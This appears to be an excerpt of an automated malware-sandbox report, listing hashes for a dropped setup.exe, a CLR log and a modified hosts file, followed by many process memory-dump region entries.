                                                7.1MB

                                                MD5

                                                e5373f1e2c782659695c5cea587fddea

                                                SHA1

                                                4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                SHA256

                                                c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                SHA512

                                                2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e5373f1e2c782659695c5cea587fddea

                                                SHA1

                                                4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                SHA256

                                                c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                SHA512

                                                2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                                Filesize

                                                539B

                                                MD5

                                                84f2160705ac9a032c002f966498ef74

                                                SHA1

                                                e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                                                SHA256

                                                7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                                                SHA512

                                                f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                                              • C:\Windows\system32\drivers\etc\hosts
                                                Filesize

                                                1KB

                                                MD5

                                                f3f6968a4c0f457f427eb17f7cc5f68b

                                                SHA1

                                                872933578f4b7d555158189ed02015f192daa7c6

                                                SHA256

                                                774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                                SHA512

                                                5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                              • memory/204-393-0x0000000000000000-mapping.dmp
                                              • memory/372-412-0x0000000000000000-mapping.dmp
                                              • memory/604-450-0x0000000000000000-mapping.dmp
                                              • memory/656-655-0x000001ABB4080000-0x000001ABB4087000-memory.dmp
                                                Filesize

                                                28KB

                                              • memory/656-652-0x000001ABB47A0000-0x000001ABB47A6000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/1608-400-0x0000000000000000-mapping.dmp
                                              • memory/1876-396-0x0000000000000000-mapping.dmp
                                              • memory/1892-425-0x0000000000000000-mapping.dmp
                                              • memory/2020-416-0x0000000000000000-mapping.dmp
                                              • memory/2080-411-0x0000000000000000-mapping.dmp
                                              • memory/2104-624-0x0000000000000000-mapping.dmp
                                              • memory/2132-475-0x000001B4F2E00000-0x000001B4F2EB9000-memory.dmp
                                                Filesize

                                                740KB

                                              • memory/2132-508-0x000001B4F28E0000-0x000001B4F28EA000-memory.dmp
                                                Filesize

                                                40KB

                                              • memory/2132-469-0x000001B4F28F0000-0x000001B4F290C000-memory.dmp
                                                Filesize

                                                112KB

                                              • memory/2132-451-0x0000000000000000-mapping.dmp
                                              • memory/2144-403-0x0000000000000000-mapping.dmp
                                              • memory/2192-626-0x0000000000000000-mapping.dmp
                                              • memory/2228-625-0x0000000000000000-mapping.dmp
                                              • memory/2228-395-0x0000000000000000-mapping.dmp
                                              • memory/2232-627-0x0000000000000000-mapping.dmp
                                              • memory/2620-617-0x0000000000000000-mapping.dmp
                                              • memory/2648-141-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-178-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-149-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-150-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-151-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-152-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-153-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-154-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-156-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-157-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-158-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-159-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-160-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-161-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-155-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-163-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-162-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-164-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-165-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-166-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-167-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-168-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-169-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-170-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-171-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-172-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-173-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-174-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-175-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-176-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-177-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-148-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-179-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-180-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-181-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-147-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-146-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-145-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-144-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-143-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-142-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-140-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-139-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-138-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-137-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-136-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-135-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-134-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-133-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-132-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-131-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-130-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-129-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-118-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-128-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-127-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-126-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-125-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-124-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-123-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-122-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-121-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-120-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2648-119-0x0000000077D70000-0x0000000077EFE000-memory.dmp
                                                Filesize

                                                1.6MB

                                              • memory/2660-437-0x0000000000400000-0x0000000001059000-memory.dmp
                                                Filesize

                                                12.3MB

                                              • memory/2660-441-0x00007FF8A0F60000-0x00007FF8A113B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/2660-440-0x0000000000400000-0x0000000001059000-memory.dmp
                                                Filesize

                                                12.3MB

                                              • memory/2660-432-0x00007FF8A0F60000-0x00007FF8A113B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/2660-431-0x0000000000400000-0x0000000001059000-memory.dmp
                                                Filesize

                                                12.3MB

                                              • memory/2664-423-0x0000000000000000-mapping.dmp
                                              • memory/2664-616-0x0000000000000000-mapping.dmp
                                              • memory/2680-398-0x0000000000000000-mapping.dmp
                                              • memory/2788-607-0x0000000000000000-mapping.dmp
                                              • memory/2916-629-0x0000000000000000-mapping.dmp
                                              • memory/3344-394-0x0000000000000000-mapping.dmp
                                              • memory/3352-618-0x0000000000000000-mapping.dmp
                                              • memory/3616-410-0x0000000000000000-mapping.dmp
                                              • memory/3624-604-0x0000000000000000-mapping.dmp
                                              • memory/3728-399-0x0000000000000000-mapping.dmp
                                              • memory/3828-603-0x0000000000000000-mapping.dmp
                                              • memory/3848-427-0x0000000000000000-mapping.dmp
                                              • memory/3904-413-0x0000000000000000-mapping.dmp
                                              • memory/3924-397-0x0000000000000000-mapping.dmp
                                              • memory/3948-414-0x0000000000000000-mapping.dmp
                                              • memory/3992-418-0x0000000000000000-mapping.dmp
                                              • memory/3992-606-0x0000000000000000-mapping.dmp
                                              • memory/4020-415-0x0000000000000000-mapping.dmp
                                              • memory/4120-632-0x0000000000000000-mapping.dmp
                                              • memory/4140-609-0x0000000000000000-mapping.dmp
                                              • memory/4240-630-0x0000000000000000-mapping.dmp
                                              • memory/4352-402-0x0000000000000000-mapping.dmp
                                              • memory/4456-417-0x0000000000000000-mapping.dmp
                                              • memory/4456-605-0x0000000000000000-mapping.dmp
                                              • memory/4524-645-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/4524-639-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/4564-401-0x0000000000000000-mapping.dmp
                                              • memory/4576-404-0x0000000000000000-mapping.dmp
                                              • memory/4588-345-0x0000029EE4EB0000-0x0000029EE52CC000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/4588-337-0x0000029EC9DE0000-0x0000029ECA1FC000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/4612-631-0x0000000000000000-mapping.dmp
                                              • memory/4628-600-0x0000000000000000-mapping.dmp
                                              • memory/4652-621-0x0000000000000000-mapping.dmp
                                              • memory/4684-619-0x0000000000000000-mapping.dmp
                                              • memory/4712-633-0x0000000000000000-mapping.dmp
                                              • memory/4796-405-0x0000000000000000-mapping.dmp
                                              • memory/4880-406-0x0000000000000000-mapping.dmp
                                              • memory/4888-622-0x0000000000000000-mapping.dmp
                                              • memory/4892-407-0x0000000000000000-mapping.dmp
                                              • memory/4924-409-0x0000000000000000-mapping.dmp
                                              • memory/4928-422-0x0000000000000000-mapping.dmp
                                              • memory/4928-354-0x0000000000000000-mapping.dmp
                                              • memory/4928-360-0x00000208DB200000-0x00000208DB222000-memory.dmp
                                                Filesize

                                                136KB

                                              • memory/4928-365-0x00000208DD3E0000-0x00000208DD456000-memory.dmp
                                                Filesize

                                                472KB

                                              • memory/4948-408-0x0000000000000000-mapping.dmp
                                              • memory/4952-185-0x0000000000000000-mapping.dmp
                                              • memory/4964-420-0x0000000000000000-mapping.dmp
                                              • memory/5004-186-0x0000000000000000-mapping.dmp
                                              • memory/5008-196-0x00007FF8A0F60000-0x00007FF8A113B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/5008-335-0x0000000000400000-0x0000000001059000-memory.dmp
                                                Filesize

                                                12.3MB

                                              • memory/5008-182-0x0000000000000000-mapping.dmp
                                              • memory/5008-193-0x0000000000400000-0x0000000001059000-memory.dmp
                                                Filesize

                                                12.3MB

                                              • memory/5008-279-0x0000000000400000-0x0000000001059000-memory.dmp
                                                Filesize

                                                12.3MB

                                              • memory/5008-280-0x00007FF8A0F60000-0x00007FF8A113B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/5008-336-0x00007FF8A0F60000-0x00007FF8A113B000-memory.dmp
                                                Filesize

                                                1.9MB

                                              • memory/5028-421-0x0000000000000000-mapping.dmp
                                              • memory/5080-601-0x0000000000000000-mapping.dmp
                                              • memory/5088-353-0x0000000000000000-mapping.dmp
                                              • memory/5096-628-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/5096-646-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/5096-611-0x0000000000401BEA-mapping.dmp
                                              • memory/5108-620-0x0000020638BB0000-0x0000020638BC2000-memory.dmp
                                                Filesize

                                                72KB

                                              • memory/5108-608-0x0000020620260000-0x0000020620266000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/5112-419-0x0000000000000000-mapping.dmp